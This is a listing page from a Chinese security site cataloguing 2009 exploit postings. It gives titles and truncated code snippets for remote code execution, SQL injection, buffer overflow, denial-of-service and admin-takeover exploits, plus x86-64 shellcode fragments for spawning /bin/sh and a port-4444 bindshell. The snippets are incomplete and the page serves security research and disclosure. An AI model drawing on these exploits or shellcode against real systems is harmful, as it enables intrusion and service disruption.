首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Jieqi CMS <= 1.5 Remote Code Execution Exploit
  日期:2009-05-19 12:44:32 点击:21 评论:0
?php print_r(' +---------------------------------------------------------------------------+ Jieqi cms = 1.5 remote code execution exploit by Securitylab.ir mail: secu_lab_ir@yahoo.com +----------------------------------------------------------------
freebsd/x86-64 exec("/bin/sh") shellcode 31 bytes
  日期:2009-05-19 12:43:38 点击:35 评论:0
/** * * _ _ _ ____ _ _ * | | | | __ _ ___| | ___ __ | _ ___ | | | * | |_| |/ _` |/ __| |/ / '_ | |_) / _ | | | * | _ | (_| | (__| | | | | | _ (_) | | | * |_| |_|__,_|___|_|__| |_| |_| ____/|_|_| * [ http://www.hacknroll.com ] * * Descript
Mereo 1.8.0 (Get Request) Remote Denial of Service Exploit
  日期:2009-05-19 12:42:52 点击:13 评论:0
import socket import sys print ------------------------------------------------------ print Mereo 1.8.0 Remote Denial Of Service print author: Stack print ------------------------------------------------------ host = 127.0.0.1 port = 80 try: buff = /
Zervit Webserver 0.04 (GET Request) Remote Buffer Overflow PoC
  日期:2009-05-19 12:42:10 点击:31 评论:0
#!/usr/bin/perl # Zervit webserver 0.4 Bof Poc # make it just for fun :s use LWP::Simple; use LWP::UserAgent; if (@ARGV 2) { print(Usage: $0 url portn); print(TARGETS aren ); print(Example: perl $0 127.0.0.1 777 n); exit(1); } ($target, $port) = @
OpenSSL <= 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS
  日期:2009-05-19 12:41:16 点击:37 评论:0
/* * cve-2009-1378.c * * OpenSSL = 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS * Jon Oberheide jon@oberheide.org * http://jon.oberheide.org * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378 * * In dtls1_proce
Dana Portal Remote Change Admin Password Exploit
  日期:2009-05-19 12:39:30 点击:48 评论:0
#!/usr/bin/python # Abysssec Inc Public Exploit Code # Title : Dana Portal Remote Change Admin Password Exploit # Affected Version : ASP Version # Vulnerable File : albumdetail.asp # Vendor Site : www.dana.ir # note : no point to keep it private any
ClanWeb 1.4.2 Remote Change Password / Add Admin Exploit
  日期:2009-05-19 12:38:51 点击:42 评论:0
=-=-remote change password and add admin xpl-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-= script:ClanWeb 1.4.2 ------------------------------------------------- Author: ahmadbady my site :Coming Soon =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
httpdx <= 0.5b FTP Server (USER) Remote BOF Exploit (SEH)
  日期:2009-05-19 12:37:54 点击:45 评论:0
#!/usr/bin/python #[*] Usage : httpdx.py [target_ip] # _ _ _ __ _ _ _ #| || | (_) ___ / | |__ | | | #| __ | | | (_- | () | | / / |_ _| #|_||_| |_| /__/ __/ |__ |_| # #[*] Bug : httpdx = 0.5b FTP Server (USER) Remote BOF Exploit (SEH) #[*] Found
linux/x86-64 bindshell(port 4444)
  日期:2009-05-18 11:35:20 点击:126 评论:0
写的很2B的一个bindshell 不过是64位的,哈哈 /* linux/x86-64 bindshell(port 4444) BITS 64 xor eax,eax xor ebx,ebx xor edx,edx ;socket mov al,0x1 mov esi,eax inc al mov edi,eax mov dl,0x6 mov al,0x29 syscall xchg ebx,eax ;store the server sock ;bind xo
Basic differences between x86 Assembly and X86-64 Assembly
  日期:2009-05-18 11:32:40 点击:142 评论:0
[ - [ - Basic differences between x86 Assembly and X86-64 Assembly [ - [ - By Gustavo C. aka hophet hophet[at]gmail.com [ - [ - http://www.openvms-rocks.com/~hophet/ [ - Rex1 - Introduction Rex2 - Registers Rex3 - Memory Rex4 - Debugging Rex5 - Examp
PHPenpals <= 1.1 (mail.php ID) Remote SQL Injection Exploit
  日期:2009-05-18 11:31:41 点击:51 评论:0
#!usr/bin/perl #|------------------------------------------------------------------------------------------------------------------ #| -Info: # #| -Name: Phpenpals #| -Version: = 1.1 #| -Site: http://sourceforge.net/projects/phpenpals/ #| -Download
Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Vulnerability
  日期:2009-05-18 11:30:14 点击:75 评论:0
#### # ##### #### # ##### ####### ### ###### ####### ###### ####### ######### ####### ######## ##################### ######### #### ######### ########## #### #### ###### ####### #### #### #### #### #### #### # ##### ######## ###### ###### ##########
freebsd/x86-64 execve /bin/sh shellcode 34 bytes
  日期:2009-05-18 11:29:21 点击:47 评论:0
/* Anderson Eduardo c0d3_z3r0 Hack'n Roll http://anderson.hacknroll.com http://blog.hacknroll.com .section .text .globl _start _start: xor %rcx,%rcx jmp string main: popq %rsi movq %rsi,%rdi pushq %rsi pushq %rcx movq %rsp,%rsi movq %rcx,%rdx movb $
Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)
  日期:2009-05-18 11:28:31 点击:33 评论:0
#usage: exploit.py #Open the program then double clic in the exploit file print ************************************************************************** print Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit (SEH)n print Credits : ha
Harland Scripts 11 Products Remote Command Execution Exploit
  日期:2009-05-18 11:26:33 点击:285 评论:0
?php //786 /* ============================================================================== _ _ _ _ _ _ / | | | | / | | | | / _ | | | | / _ | |_| | / ___ | |___ | |___ / ___ | _ | IN THE NAME OF /_/ _ |_____| |_____| /_/ _ |_| |_| =
Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit
  日期:2009-05-18 11:25:28 点击:21 评论:0
#!/usr/bin/perl # by hack4love # hack4love@hotmail.com # Audioactive player v1.93b (.m3u) Local buffer Overflow Exploit # Greetz to all my friends # From EGYPT ################################################################## my $bof=x41 x 224; my
Jieqi CMS versions 1.5 and below remote code execution exploit
  日期:2009-05-15 10:34:40 点击:22 评论:0
?phpprint_r('+---------------------------------------------------------------------------+Jieqi cms = 1.5 remote code execution exploitby Securitylab.irmail: secu_lab_ir@yahoo.com+---------------------------------------------------------------------
linux/x86-64 setuid(0) + execve(/bin/sh) 49 bytes
  日期:2009-05-15 10:33:21 点击:101 评论:0
/* setuid(0) + execve(/bin/sh) - just 4 fun. xi4oyu [at] 80sec.com main(){ __asm( xorq %rdi,%rdint mov $0x69,%alnt syscall nt xorq %rdx, %rdx nt movq $0x68732f6e69622fff,%rbx; nt shr $0x8, %rbx; nt push %rbx; nt movq %rsp,%rdi; nt xor
2daybiz Template Monster Clone (edituser.php) Change Pass Exploit
  日期:2009-05-15 10:32:03 点击:39 评论:0
title Template Monster Clone Change Password /title /head head /head body bgcolor=#000000 pfont size=6 color=#FF0000a href= http://www.2daybiz.com/ font color=#FF00002daybiz/font/a Template Monster Clonenbsp; /font/p TABLE border=0 width=780 align=c
2daybiz Business Community Script Multiple Remote Vulnerabilities
  日期:2009-05-15 10:31:25 点击:29 评论:0
------------------------------------------------------------------------------------------------------------- 2daybiz Business Community Script (adminaddeditdetails.php) Add Admin / Remote Blind SQL Injection Exploit --------------------------------
共637页/12733条记录 首页 上一页 [453] [454] [455] 456 [457] [458] [459] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved